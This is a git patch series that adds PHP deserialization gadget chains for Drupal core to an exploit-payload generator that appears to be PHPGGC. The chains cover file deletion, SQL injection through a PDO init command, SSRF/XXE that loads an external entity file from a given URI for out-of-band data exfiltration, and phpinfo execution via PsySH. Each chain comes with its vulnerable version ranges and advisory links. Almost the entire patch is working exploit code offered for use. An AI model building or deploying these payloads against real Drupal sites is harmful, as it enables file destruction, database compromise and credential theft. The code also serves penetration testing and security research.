From 614db9d029f7c12a8603ecf70a1b71a89b4730b4 Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Wed, 4 Dec 2024 16:03:52 +0000
Subject: [PATCH 1/5] rename directory

---
 gadgetchains/{Drupal9 => Drupal}/RCE/1/chain.php   | 0
 gadgetchains/{Drupal9 => Drupal}/RCE/1/gadgets.php | 0
 2 files changed, 0 insertions(+), 0 deletions(-)
 rename gadgetchains/{Drupal9 => Drupal}/RCE/1/chain.php (100%)
 rename gadgetchains/{Drupal9 => Drupal}/RCE/1/gadgets.php (100%)

diff --git a/gadgetchains/Drupal9/RCE/1/chain.php b/gadgetchains/Drupal/RCE/1/chain.php
similarity index 100%
rename from gadgetchains/Drupal9/RCE/1/chain.php
rename to gadgetchains/Drupal/RCE/1/chain.php
diff --git a/gadgetchains/Drupal9/RCE/1/gadgets.php b/gadgetchains/Drupal/RCE/1/gadgets.php
similarity index 100%
rename from gadgetchains/Drupal9/RCE/1/gadgets.php
rename to gadgetchains/Drupal/RCE/1/gadgets.php

From b89a66a225a4ff661bee1e5c035f3001bf1b6189 Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Wed, 4 Dec 2024 17:09:47 +0000
Subject: [PATCH 2/5] Drupal/FD1

---
 gadgetchains/Drupal/FD/1/chain.php   | 20 ++++++++++++++++++++
 gadgetchains/Drupal/FD/1/gadgets.php | 21 +++++++++++++++++++++
 2 files changed, 41 insertions(+)
 create mode 100644 gadgetchains/Drupal/FD/1/chain.php
 create mode 100644 gadgetchains/Drupal/FD/1/gadgets.php

diff --git a/gadgetchains/Drupal/FD/1/chain.php b/gadgetchains/Drupal/FD/1/chain.php
new file mode 100644
index 00000000..e94d0c2d
--- /dev/null
+++ b/gadgetchains/Drupal/FD/1/chain.php
@@ -0,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Drupal;
+
+class FD1 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public static $version = '>= 8.0.0 < 10.2.11 || >= 10.3.0 < 10.3.9 || >= 11.0.0 < 11.0.8';
+    public static $vector = '__wakeup';
+    public static $author = 'mcdruid';
+    public static $information = 'See: https://www.drupal.org/sa-core-2024-006';
+
+    public function generate(array $parameters)
+    {
+        return new \Drupal\Core\Config\StorageComparer(
+            new \Drupal\Component\PhpStorage\FileStorage(
+                $parameters['remote_path']
+            )
+        );
+    }
+}
diff --git a/gadgetchains/Drupal/FD/1/gadgets.php b/gadgetchains/Drupal/FD/1/gadgets.php
new file mode 100644
index 00000000..378626f5
--- /dev/null
+++ b/gadgetchains/Drupal/FD/1/gadgets.php
@@ -0,0 +1,21 @@
+<?php
+
+namespace Drupal\Core\Config {
+    class StorageComparer {
+        protected $targetCacheStorage;
+        public function __construct($targetCacheStorage)
+        {
+            $this->targetCacheStorage = $targetCacheStorage;
+        }
+    }
+}
+
+namespace Drupal\Component\PhpStorage {
+    class FileStorage {
+        protected $directory;
+        public function __construct($directory)
+        {
+            $this->directory = $directory;
+        }
+    }
+}
\ No newline at end of file

From c157d9d412ec45caa30f9f80aa4c884c15d0aeb4 Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Wed, 4 Dec 2024 17:10:40 +0000
Subject: [PATCH 3/5] Drupal SQLI1 and SSRF1

---
 gadgetchains/Drupal/SQLI/1/chain.php   | 28 ++++++++++++++++++++++++++
 gadgetchains/Drupal/SQLI/1/gadgets.php |  3 +++
 gadgetchains/Drupal/SSRF/1/chain.php   | 27 +++++++++++++++++++++++++
 gadgetchains/Drupal/SSRF/1/gadgets.php | 27 +++++++++++++++++++++++++
 4 files changed, 85 insertions(+)
 create mode 100644 gadgetchains/Drupal/SQLI/1/chain.php
 create mode 100644 gadgetchains/Drupal/SQLI/1/gadgets.php
 create mode 100644 gadgetchains/Drupal/SSRF/1/chain.php
 create mode 100644 gadgetchains/Drupal/SSRF/1/gadgets.php

diff --git a/gadgetchains/Drupal/SQLI/1/chain.php b/gadgetchains/Drupal/SQLI/1/chain.php
new file mode 100644
index 00000000..8cd6326a
--- /dev/null
+++ b/gadgetchains/Drupal/SQLI/1/chain.php
@@ -0,0 +1,28 @@
+<?php
+
+namespace GadgetChain\Drupal;
+
+class SQLI1 extends \PHPGGC\GadgetChain\SqlInjection
+{
+    public static $version = '>= 8.0.0 < 10.2.11 || >= 10.3.0 < 10.3.9';
+    public static $vector = '__wakeup';
+    public static $author = 'mcdruid';
+    public static $information = 'See: https://gist.github.com/paul-axe/2a384bb5f2d430dd3b63b2484af960f4
+    See: https://www.drupal.org/sa-core-2024-008
+    Drupal/SSRF1 can be used to extract db credentials for SQL injection.';
+
+    public function generate(array $parameters)
+    {
+        return new \Drupal\Core\Url(
+            new \Drupal\Core\Database\StatementPrefetch(
+                'PDO',                                // class
+                [
+                    'mysql:dbname=db;host=db',        // DSN
+                    'db',                             // username
+                    'db',                             // password
+                    [1002 => $parameters['sql']]      // PDO::MYSQL_ATTR_INIT_COMMAND
+                ]
+            )
+        );
+    }
+}
diff --git a/gadgetchains/Drupal/SQLI/1/gadgets.php b/gadgetchains/Drupal/SQLI/1/gadgets.php
new file mode 100644
index 00000000..0822e73f
--- /dev/null
+++ b/gadgetchains/Drupal/SQLI/1/gadgets.php
@@ -0,0 +1,3 @@
+<?php
+
+require_once(DIR_GADGETCHAINS . '/Drupal/SSRF/1/gadgets.php');
\ No newline at end of file
diff --git a/gadgetchains/Drupal/SSRF/1/chain.php b/gadgetchains/Drupal/SSRF/1/chain.php
new file mode 100644
index 00000000..bf62165e
--- /dev/null
+++ b/gadgetchains/Drupal/SSRF/1/chain.php
@@ -0,0 +1,27 @@
+<?php
+
+namespace GadgetChain\Drupal;
+
+class SSRF1 extends \PHPGGC\GadgetChain\SSRF
+{
+    public static $version = '>= 8.0.0 < 10.2.11 || >= 10.3.0 < 10.3.9';
+    public static $vector = '__wakeup';
+    public static $author = 'mcdruid';
+    public static $information = 'See: https://gist.github.com/paul-axe/2a384bb5f2d430dd3b63b2484af960f4
+    See: https://www.drupal.org/sa-core-2024-008
+    https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-exfiltrate-data-out-of-band';
+
+    public function generate(array $parameters)
+    {
+        return new \Drupal\Core\Url(
+            new \Drupal\Core\Database\StatementPrefetch(
+                'SimpleXMLElement',
+                [
+                    $parameters['uri'], // e.g. 'http://10.11.12.13/xxe.xml'
+                    LIBXML_BIGLINES | LIBXML_DTDLOAD | LIBXML_NOENT | LIBXML_PARSEHUGE,
+                    true
+                ]
+            )
+        );
+    }
+}
diff --git a/gadgetchains/Drupal/SSRF/1/gadgets.php b/gadgetchains/Drupal/SSRF/1/gadgets.php
new file mode 100644
index 00000000..8acce5c2
--- /dev/null
+++ b/gadgetchains/Drupal/SSRF/1/gadgets.php
@@ -0,0 +1,27 @@
+<?php
+
+namespace Drupal\Core {
+    class Url {
+        // use DependencySerializationTrait;
+        protected $_serviceIds = [];
+        public function __construct($serviceIds) {
+            $this->_serviceIds = $serviceIds;
+        }
+
+    }
+}
+
+namespace Drupal\Core\Database {
+    class StatementPrefetch
+    {
+        protected $currentRow = array();
+        protected $fetchStyle = 8; // PDO::FETCH_CLASS
+        protected $fetchOptions = array();
+
+        function __construct($class, $constructor_args)
+        {
+            $this->fetchOptions['class'] = $class;
+            $this->fetchOptions['constructor_args'] = $constructor_args;
+        }
+    }
+}
\ No newline at end of file

From dbcbd64577dc1ee47ec47a7ae9bc560d1675f005 Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Fri, 25 Oct 2024 14:38:45 +0100
Subject: [PATCH 4/5] Drupal9/INFO1

---
 gadgetchains/Drupal9/INFO/1/chain.php   | 25 ++++++++++++
 gadgetchains/Drupal9/INFO/1/gadgets.php | 51 +++++++++++++++++++++++++
 2 files changed, 76 insertions(+)
 create mode 100644 gadgetchains/Drupal9/INFO/1/chain.php
 create mode 100644 gadgetchains/Drupal9/INFO/1/gadgets.php

diff --git a/gadgetchains/Drupal9/INFO/1/chain.php b/gadgetchains/Drupal9/INFO/1/chain.php
new file mode 100644
index 00000000..112f25d6
--- /dev/null
+++ b/gadgetchains/Drupal9/INFO/1/chain.php
@@ -0,0 +1,25 @@
+<?php
+
+namespace GadgetChain\Drupal9;
+
+class INFO1 extends \PHPGGC\GadgetChain\PHPInfo
+{
+    public static $version = '9.4.2+';
+    public static $vector = '__wakeup';
+    public static $author = 'mcdruid';
+    public static $information =
+        'This requires PsySH which is bundled with drush. It is common but not
+        mandatory for drush to be installed along with Drupal core. Other PHP
+        functions could be executed, but no parameters can be passed.';
+
+    public function generate(array $parameters)
+    {
+        return (
+            new \Drupal\views\ViewExecutable(
+                new \Psy\ExecutionClosure('phpinfo'),
+                new \Drupal\Views\DisplayPluginCollection(),
+                new \Drupal\views\Plugin\views\display\DefaultDisplay()
+            )
+        );
+    }
+}
diff --git a/gadgetchains/Drupal9/INFO/1/gadgets.php b/gadgetchains/Drupal9/INFO/1/gadgets.php
new file mode 100644
index 00000000..9c295648
--- /dev/null
+++ b/gadgetchains/Drupal9/INFO/1/gadgets.php
@@ -0,0 +1,51 @@
+<?php
+
+namespace Drupal\views {
+    class ViewExecutable
+    {
+           protected $serializationData = [
+               'executed' => TRUE,
+               'storage' => 'frontpage',
+               'current_display' => 'default',
+               'args' => [],
+               'current_page' => '',
+               'exposed_input' => '',
+               'exposed_data' => '',
+               'exposed_raw_input' => '',
+               'dom_id' => '',
+           ];
+           public $built = TRUE;
+           public $live_preview = TRUE;
+           public $query;
+           public $displayHandlers;
+           public $display_handler;
+
+           function __construct($query, $displayHandlers, $display_handler) {
+               $this->query = $query;
+               $this->displayHandlers = $displayHandlers;
+               $this->display_handler = $display_handler;
+           }
+    }
+
+    class DisplayPluginCollection
+    {
+
+    }
+}
+
+namespace Drupal\views\Plugin\views\display {
+    class DefaultDisplay
+    {
+
+    }
+}
+
+namespace Psy {
+    class ExecutionClosure {
+        protected $closure;
+
+        function __construct($closure) {
+            $this->closure = $closure;
+        }
+    }
+}

From af662bb391c2ea78b91bdc17a2f444f44737c741 Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Wed, 4 Dec 2024 17:17:28 +0000
Subject: [PATCH 5/5] Drupal/INFO1

---
 gadgetchains/{Drupal9 => Drupal}/INFO/1/chain.php   | 8 ++++----
 gadgetchains/{Drupal9 => Drupal}/INFO/1/gadgets.php | 0
 2 files changed, 4 insertions(+), 4 deletions(-)
 rename gadgetchains/{Drupal9 => Drupal}/INFO/1/chain.php (68%)
 rename gadgetchains/{Drupal9 => Drupal}/INFO/1/gadgets.php (100%)

diff --git a/gadgetchains/Drupal9/INFO/1/chain.php b/gadgetchains/Drupal/INFO/1/chain.php
similarity index 68%
rename from gadgetchains/Drupal9/INFO/1/chain.php
rename to gadgetchains/Drupal/INFO/1/chain.php
index 112f25d6..8700ff9a 100644
--- a/gadgetchains/Drupal9/INFO/1/chain.php
+++ b/gadgetchains/Drupal/INFO/1/chain.php
@@ -1,14 +1,14 @@
 <?php
 
-namespace GadgetChain\Drupal9;
+namespace GadgetChain\Drupal;
 
 class INFO1 extends \PHPGGC\GadgetChain\PHPInfo
 {
-    public static $version = '9.4.2+';
+    public static $version = '>= 8.0.0 < 10.2.11 || >= 10.3.0 < 10.3.9 || >= 11.0.0 < 11.0.8';
     public static $vector = '__wakeup';
     public static $author = 'mcdruid';
-    public static $information =
-        'This requires PsySH which is bundled with drush. It is common but not
+    public static $information = 'See: https://www.drupal.org/sa-core-2024-007
+        This requires PsySH which is bundled with drush. It is common but not
         mandatory for drush to be installed along with Drupal core. Other PHP
         functions could be executed, but no parameters can be passed.';
 
diff --git a/gadgetchains/Drupal9/INFO/1/gadgets.php b/gadgetchains/Drupal/INFO/1/gadgets.php
similarity index 100%
rename from gadgetchains/Drupal9/INFO/1/gadgets.php
rename to gadgetchains/Drupal/INFO/1/gadgets.php